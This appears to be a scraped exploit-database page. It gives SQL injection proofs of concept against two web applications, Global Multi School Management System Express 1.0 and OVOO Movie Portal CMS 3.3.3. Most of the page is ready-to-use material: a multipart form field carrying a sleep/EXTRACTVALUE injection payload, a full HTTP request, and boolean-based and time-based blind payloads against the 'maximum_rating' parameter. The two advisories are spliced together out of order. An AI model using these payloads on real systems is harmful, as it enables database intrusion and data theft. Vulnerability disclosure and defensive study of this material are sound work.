------------YWJkMTQzNDcwContent-Disposition: form-data; name="school_id"0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' ANDEXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx------------YWJkMTQzNDcwContent-Disposition: form-data; name="academic_year_id"------------YWJkMTQzNDcwContent-Disposition: form-data; name="group_by"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_from"------------YWJkMTQzNDcwContent-Disposition: form-data; name="date_to"------------YWJkMTQzNDcw–

Global Multi School Management System Express 1.0 SQL Injection

OVOO Movie Portal CMS version 3.3.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: OVOO Movie Portal CMS v3.3.3 - SQL Injection# Date: 2023-08-12# Exploit Author: Ahmet Ümit BAYRAM# Vendor: https://codecanyon.net/item/ovoomovie-video-streaming-cms-with-unlimited-tvseries/20180569# Tested on: Kali Linux & MacOS# CVE: N/A### Request ###POST /filter_movies/1 HTTP/2Host: localhostCookie: ci_session=tiic5hcli8v3qkg1chgj0dqpou9495usUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)Gecko/20100101 Firefox/116.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://localhost/movies.htmlContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 60Origin: htts://localhostSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=fetch_data&minimum_rating=1&maximum_rating=6.8&page=1### Parameter & Payloads ###Parameter: maximum_rating (POST)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND2238=2238&page=1Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: action=fetch_data&minimum_rating=1&maximum_rating=6.8 AND (SELECT4101 FROM (SELECT(SLEEP(5)))FLwc)&page=1

Tag

#mac